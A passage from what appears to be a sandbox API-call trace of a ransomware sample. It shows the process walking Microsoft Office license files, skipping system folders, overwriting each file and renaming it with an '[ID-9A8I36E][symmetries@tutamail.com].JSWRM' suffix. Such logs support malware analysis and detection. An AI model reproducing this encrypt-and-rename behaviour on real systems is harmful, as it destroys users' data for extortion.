office\\root\\licenses16\\accessvl_kms_client-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_KMS_Client-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_kms_client-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0102.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0102.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0102.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.571] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.571] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe303760d, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe303760d, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3201264, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2586, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AccessVL_KMS_Client-ul.xrm-ms", cAlternateFileName="AC4FC4~1.XRM")) returned 1 [0102.571] lstrcmpiW (lpString1="AccessVL_KMS_Client-ul.xrm-ms", lpString2=".") returned 1 [0102.571] lstrcmpiW (lpString1="AccessVL_KMS_Client-ul.xrm-ms", lpString2="..") returned 1 [0102.571] lstrcmpiW (lpString1="AccessVL_KMS_Client-ul.xrm-ms", lpString2="...") returned 1 [0102.571] lstrcmpiW (lpString1="AccessVL_KMS_Client-ul.xrm-ms", lpString2="windows") returned -1 [0102.571] lstrcmpiW (lpString1="AccessVL_KMS_Client-ul.xrm-ms", lpString2="recovery") returned -1 [0102.571] lstrcmpiW (lpString1="AccessVL_KMS_Client-ul.xrm-ms", lpString2="perflogs") returned -1 [0102.571] lstrcmpiW (lpString1="AccessVL_KMS_Client-ul.xrm-ms", lpString2="documents and settings") returned -1 [0102.571] lstrcmpiW (lpString1="AccessVL_KMS_Client-ul.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.571] lstrcmpiW (lpString1="AccessVL_KMS_Client-ul.xrm-ms", lpString2="system volume information") returned -1 [0102.571] lstrcmpiW (lpString1="AccessVL_KMS_Client-ul.xrm-ms", lpString2="msocache") returned -1 [0102.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d770 [0102.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_KMS_Client-ul.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0102.571] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0102.571] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_KMS_Client-ul.xrm-ms", cchWideChar=29, lpMultiByteStr=0x240fe8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0102.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d770 | out: hHeap=0x1e0000) returned 1 [0102.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0102.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_KMS_Client-ul.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0102.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0102.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_KMS_Client-ul.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessVL_KMS_Client-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0102.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0102.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0102.572] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0102.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.572] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0102.572] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_kms_client-ul.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.572] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=9606) returned 1 [0102.572] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.572] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2580) returned 0x24c1d0 [0102.572] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2580, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2580, lpOverlapped=0x0) returned 1 [0102.576] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.576] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2580, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2580, lpOverlapped=0x0) returned 1 [0102.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.577] CloseHandle (hObject=0x45c) returned 1 [0102.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0102.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0102.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1e0 [0102.577] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1e0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1e0 | out: hHeap=0x1e0000) returned 1 [0102.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0102.577] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e9d0 [0102.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0102.577] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0102.577] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_KMS_Client-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_kms_client-ul.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_KMS_Client-ul.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_kms_client-ul.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e9d0 | out: hHeap=0x1e0000) returned 1 [0102.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d5d8 | out: hHeap=0x1e0000) returned 1 [0102.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0102.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0102.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0102.578] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe318eac3, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe318eac3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe3299b47, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x297f, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AccessVL_MAK-pl.xrm-ms", cAlternateFileName="AC3BFD~1.XRM")) returned 1 [0102.578] lstrcmpiW (lpString1="AccessVL_MAK-pl.xrm-ms", lpString2=".") returned 1 [0102.578] lstrcmpiW (lpString1="AccessVL_MAK-pl.xrm-ms", lpString2="..") returned 1 [0102.578] lstrcmpiW (lpString1="AccessVL_MAK-pl.xrm-ms", lpString2="...") returned 1 [0102.578] lstrcmpiW (lpString1="AccessVL_MAK-pl.xrm-ms", lpString2="windows") returned -1 [0102.578] lstrcmpiW (lpString1="AccessVL_MAK-pl.xrm-ms", lpString2="recovery") returned -1 [0102.578] lstrcmpiW (lpString1="AccessVL_MAK-pl.xrm-ms", lpString2="perflogs") returned -1 [0102.578] lstrcmpiW (lpString1="AccessVL_MAK-pl.xrm-ms", lpString2="documents and settings") returned -1 [0102.578] lstrcmpiW (lpString1="AccessVL_MAK-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.578] lstrcmpiW (lpString1="AccessVL_MAK-pl.xrm-ms", lpString2="system volume information") returned -1 [0102.578] lstrcmpiW (lpString1="AccessVL_MAK-pl.xrm-ms", lpString2="msocache") returned -1 [0102.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.578] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_MAK-pl.xrm-ms", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0102.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0102.578] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_MAK-pl.xrm-ms", cchWideChar=22, lpMultiByteStr=0x2413a8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 22 [0102.578] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.578] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_MAK-pl.xrm-ms", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0102.578] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0102.578] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_MAK-pl.xrm-ms", cchWideChar=22, lpMultiByteStr=0x2412b8, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessVL_MAK-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 22 [0102.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0102.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0102.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.579] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cea0 [0102.579] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_mak-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.579] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=10623) returned 1 [0102.579] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2970) returned 0x24c1d0 [0102.579] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2970, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2970, lpOverlapped=0x0) returned 1 [0102.583] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.583] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2970, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2970, lpOverlapped=0x0) returned 1 [0102.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.583] CloseHandle (hObject=0x45c) returned 1 [0102.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0102.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0102.583] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0102.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0102.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0102.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0102.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.583] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_MAK-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_mak-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_MAK-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_mak-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0102.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0102.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cea0 | out: hHeap=0x1e0000) returned 1 [0102.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0102.584] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0102.584] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe30113f9, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe30113f9, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe31db01c, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1a49, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="AccessVL_MAK-ppd.xrm-ms", cAlternateFileName="ACF0DC~1.XRM")) returned 1 [0102.584] lstrcmpiW (lpString1="AccessVL_MAK-ppd.xrm-ms", lpString2=".") returned 1 [0102.584] lstrcmpiW (lpString1="AccessVL_MAK-ppd.xrm-ms", lpString2="..") returned 1 [0102.584] lstrcmpiW (lpString1="AccessVL_MAK-ppd.xrm-ms", lpString2="...") returned 1 [0102.584] lstrcmpiW (lpString1="AccessVL_MAK-ppd.xrm-ms", lpString2="windows") returned -1 [0102.584] lstrcmpiW (lpString1="AccessVL_MAK-ppd.xrm-ms", lpString2="recovery") returned -1 [0102.584] lstrcmpiW (lpString1="AccessVL_MAK-ppd.xrm-ms", lpString2="perflogs") returned -1 [0102.584] lstrcmpiW (lpString1="AccessVL_MAK-ppd.xrm-ms", lpString2="documents and settings") returned -1 [0102.584] lstrcmpiW (lpString1="AccessVL_MAK-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.584] lstrcmpiW (lpString1="AccessVL_MAK-ppd.xrm-ms", lpString2="system volume information") returned -1 [0102.584] lstrcmpiW (lpString1="AccessVL_MAK-ppd.xrm-ms", lpString2="msocache") returned -1 [0102.584] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_MAK-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0102.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0102.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_MAK-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x2412b8, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0102.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_MAK-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0102.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0102.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AccessVL_MAK-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x241268, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AccessVL_MAK-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0102.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0102.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0102.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.585] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d098 [0102.585] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\AccessVL_MAK-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\accessvl_mak-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.585] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=6729) returned 1 [0102.585] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a40) returned 0x205850 [0102.585] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a40, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1a40, lpOverlapped=0x0) returned 1 [0102.587] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.587] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a40, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1a40, lpOverlapped=0x0) returned 1 [0102.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0102.588] CloseHandle (hObject=0x45c) returned 1 [0102.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0102.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0102.588] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.588] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0102.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 